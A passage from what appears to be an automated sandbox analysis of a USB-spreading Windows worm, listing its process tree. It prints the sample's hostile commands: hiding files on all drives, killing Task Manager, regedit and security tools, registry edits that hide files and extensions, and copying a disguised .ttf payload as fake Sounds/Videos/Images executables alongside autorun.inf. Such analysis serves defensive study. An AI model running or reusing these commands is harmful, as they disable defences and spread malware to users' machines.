    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul attrib +r +h +s l:\*.sis /s
    3⤵
    PID:396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul attrib +r +h +s m:\*.sis /s
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul attrib +r +h +s n:\*.sis /s
    3⤵
    PID:764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul attrib +r +h +s o:\*.sis /s
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul attrib +r +h +s p:\*.sis /s
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul attrib +r +h +s q:\*.sis /s
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul attrib +r +h +s r:\*.sis /s
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul attrib +r +h +s s:\*.sis /s
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul attrib +r +h +s t:\*.sis /s
    3⤵
    PID:2068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul attrib +r +h +s u:\*.sis /s
    3⤵
    - System Location Discovery: System Language Discovery
    PID:292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul attrib +r +h +s v:\*.sis /s
    3⤵
    PID:3024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul attrib +r +h +s w:\*.sis /s
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul attrib +r +h +s x:\*.sis /s
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul attrib +r +h +s y:\*.sis /s
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul attrib +r +h +s z:\*.sis /s
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul attrib +r +h +s c:\*.jar /s
    3⤵
    PID:1544
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s c:\*.jar /s
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul attrib +r +h +s d:\*.jar /s
    3⤵
    PID:2980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul attrib +r +h +s e:\*.jar /s
    3⤵
    PID:2972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul attrib +r +h +s f:\*.jar /s
    3⤵
    PID:2840
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s f:\*.jar /s
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:1756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul attrib +r +h +s g:\*.jar /s
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul attrib +r +h +s h:\*.jar /s
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul attrib +r +h +s i:\*.jar /s
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul attrib +r +h +s j:\*.jar /s
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul attrib +r +h +s k:\*.jar /s
    3⤵
    PID:2900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul attrib +r +h +s l:\*.jar /s
    3⤵
    PID:2724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul attrib +r +h +s m:\*.jar /s
    3⤵
    PID:2312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul attrib +r +h +s n:\*.jar /s
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul attrib +r +h +s o:\*.jar /s
    3⤵
    PID:2612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul attrib +r +h +s p:\*.jar /s
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul attrib +r +h +s q:\*.jar /s
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul attrib +r +h +s r:\*.jar /s
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul attrib +r +h +s s:\*.jar /s
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul attrib +r +h +s t:\*.jar /s
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul attrib +r +h +s u:\*.jar /s
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul attrib +r +h +s v:\*.jar /s
    3⤵
    PID:2704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul attrib +r +h +s w:\*.jar /s
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul attrib +r +h +s x:\*.jar /s
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul attrib +r +h +s y:\*.jar /s
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul attrib +r +h +s z:\*.jar /s
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul attrib +r +h +s c:\*.sisx /s
    3⤵
    PID:2608
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s c:\*.sisx /s
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul attrib +r +h +s d:\*.sisx /s
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul attrib +r +h +s e:\*.sisx /s
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul attrib +r +h +s f:\*.sisx /s
    3⤵
    PID:3044
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s f:\*.sisx /s
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul attrib +r +h +s g:\*.sisx /s
    3⤵
    PID:3056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul attrib +r +h +s h:\*.sisx /s
    3⤵
    PID:1120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul attrib +r +h +s i:\*.sisx /s
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul attrib +r +h +s j:\*.sisx /s
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul attrib +r +h +s k:\*.sisx /s
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul attrib +r +h +s l:\*.sisx /s
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul attrib +r +h +s m:\*.sisx /s
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul attrib +r +h +s n:\*.sisx /s
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul attrib +r +h +s o:\*.sisx /s
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul attrib +r +h +s p:\*.sisx /s
    3⤵
    PID:2788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul attrib +r +h +s q:\*.sisx /s
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul attrib +r +h +s r:\*.sisx /s
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul attrib +r +h +s s:\*.sisx /s
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul attrib +r +h +s t:\*.sisx /s
    3⤵
    PID:2884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul attrib +r +h +s u:\*.sisx /s
    3⤵
    PID:2240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul attrib +r +h +s v:\*.sisx /s
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul attrib +r +h +s w:\*.sisx /s
    3⤵
    PID:2264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul attrib +r +h +s x:\*.sisx /s
    3⤵
    PID:2196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul attrib +r +h +s y:\*.sisx /s
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul attrib +r +h +s z:\*.sisx /s
    3⤵
    PID:816
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im notepad.exe /im rundll32.exe /im taskmgr.exe /im regedit.exe /im USBGuard.exe /im MPBrowser.exe /im HijackThis.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1760
- - C:\Windows\Help\KGC.exe
    C:\Windows\Help\KGC.exe
    3⤵
    - Executes dropped EXE
    PID:916
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c C:\Users\Admin\AppData\Local\Temp\a07829.bat C:\Windows\Help\KGC.exe
      4⤵
      Loads dropped DLL
      Drops file in System32 directory
      Drops file in Windows directory
      PID:580
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /V ShowSuperHidden /t REG_DWORD /D 0 /f
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Modifies registry key
        
        PID:536
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /V HideFileExt /t REG_DWORD /d 1 /f
        5⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2316
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /V Hidden /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2224
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Sounds.exe /y
        5⤵
        
        PID:1564
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Sounds.exe /y
        5⤵
        
        PID:2984
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Sounds.exe /y
        5⤵
        
        PID:2100
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Sounds.exe /y
        5⤵
        
        PID:1124
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Sounds.exe /y
        5⤵
        
        PID:1792
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Sounds.exe /y
        5⤵
        
        PID:1228
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Sounds.exe /y
        5⤵
        
        PID:1480
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Sounds.exe /y
        5⤵
        
        PID:1884
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Sounds.exe /y
        5⤵
        
        PID:2104
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Sounds.exe /y
        5⤵
        
        PID:880
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Sounds.exe /y
        5⤵
        
        PID:1964
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Sounds.exe /y
        5⤵
        
        PID:2676
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Sounds.exe /y
        5⤵
        
        PID:1652
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Sounds.exe /y
        5⤵
        
        PID:1668
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Sounds.exe /y
        5⤵
        
        PID:1636
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Sounds.exe /y
        5⤵
        
        PID:2208
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Sounds.exe /y
        5⤵
        
        PID:1688
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Sounds.exe /y
        5⤵
        
        PID:1224
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Sounds.exe /y
        5⤵
        
        PID:1984
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Sounds.exe /y
        5⤵
        
        PID:2472
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Sounds.exe /y
        5⤵
        
        PID:2260
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Sounds.exe /y
        5⤵
        
        PID:2256
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Sounds.exe /y
        5⤵
        
        PID:2924
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Sounds.exe /y
        5⤵
        
        PID:1716
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\system\drver.cab.sys c:\autorun.inf /y
        5⤵
        Drops autorun.inf file
        
        PID:3008
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\system\drver.cab.sys d:\autorun.inf /y
        5⤵
        
        PID:996
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\system\drver.cab.sys e:\autorun.inf /y
        5⤵
        
        PID:1920
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\system\drver.cab.sys f:\autorun.inf /y
        5⤵
        Drops autorun.inf file
        
        PID:1684
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\system\drver.cab.sys g:\autorun.inf /y
        5⤵
        
        PID:2516
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\system\drver.cab.sys h:\autorun.inf /y
        5⤵
        
        PID:1324
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\system\drver.cab.sys i:\autorun.inf /y
        5⤵
        
        PID:1424
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\system\drver.cab.sys j:\autorun.inf /y
        5⤵
        
        PID:2964
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\system\drver.cab.sys k:\autorun.inf /y
        5⤵
        
        PID:1376
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\system\drver.cab.sys l:\autorun.inf /y
        5⤵
        
        PID:1252
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\system\drver.cab.sys m:\autorun.inf /y
        5⤵
        
        PID:2280
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\system\drver.cab.sys n:\autorun.inf /y
        5⤵
        
        PID:1988
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\system\drver.cab.sys o:\autorun.inf /y
        5⤵
        
        PID:1888
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\system\drver.cab.sys p:\autorun.inf /y
        5⤵
        
        PID:3012
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\system\drver.cab.sys q:\autorun.inf /y
        5⤵
        
        PID:836
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\system\drver.cab.sys r:\autorun.inf /y
        5⤵
        
        PID:396
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\system\drver.cab.sys s:\autorun.inf /y
        5⤵
        
        PID:2124
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\system\drver.cab.sys t:\autorun.inf /y
        5⤵
        
        PID:764
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\system\drver.cab.sys u:\autorun.inf /y
        5⤵
        
        PID:1440
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\system\drver.cab.sys v:\autorun.inf /y
        5⤵
        
        PID:2276
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\system\drver.cab.sys w:\autorun.inf /y
        5⤵
        
        PID:2052
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\system\drver.cab.sys x:\autorun.inf /y
        5⤵
        
        PID:2200
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\system\drver.cab.sys y:\autorun.inf /y
        5⤵
        
        PID:1584
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\system\drver.cab.sys z:\autorun.inf /y
        5⤵
        
        PID:888
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Videos.exe /y
        5⤵
        
        PID:2380
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Videos.exe /y
        5⤵
        
        PID:2740
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Videos.exe /y
        5⤵
        
        PID:1520
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Videos.exe /y
        5⤵
        
        PID:1540
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Videos.exe /y
        5⤵
        
        PID:1552
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Videos.exe /y
        5⤵
        
        PID:2908
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Videos.exe /y
        5⤵
        
        PID:2980
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Videos.exe /y
        5⤵
        
        PID:2972
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Videos.exe /y
        5⤵
        
        PID:1756
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Videos.exe /y
        5⤵
        
        PID:2840
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Videos.exe /y
        5⤵
        
        PID:2864
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Videos.exe /y
        5⤵
        
        PID:2744
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Videos.exe /y
        5⤵
        
        PID:2720
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Videos.exe /y
        5⤵
        
        PID:2836
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Videos.exe /y
        5⤵
        
        PID:2900
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Videos.exe /y
        5⤵
        
        PID:2724
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Videos.exe /y
        5⤵
        
        PID:2312
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Videos.exe /y
        5⤵
        
        PID:2968
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Videos.exe /y
        5⤵
        
        PID:2612
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Videos.exe /y
        5⤵
        
        PID:2752
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Videos.exe /y
        5⤵
        
        PID:2856
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Videos.exe /y
        5⤵
        
        PID:2780
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Videos.exe /y
        5⤵
        
        PID:2952
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Videos.exe /y
        5⤵
        
        PID:2832
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Images.exe /y
        5⤵
        
        PID:1904
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Images.exe /y
        5⤵
        
        PID:2868
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Images.exe /y
        5⤵
        
        PID:2896
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Images.exe /y
        5⤵
        
        PID:1008
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Images.exe /y
        5⤵
        
        PID:2668
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Images.exe /y
        5⤵
        
        PID:2604
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Images.exe /y
        5⤵
        
        PID:1740
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Images.exe /y
        5⤵
        
        PID:2640
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Images.exe /y
        5⤵
        
        PID:2420
    - - C:\Windows\SysWOW64\cmd.exe
        
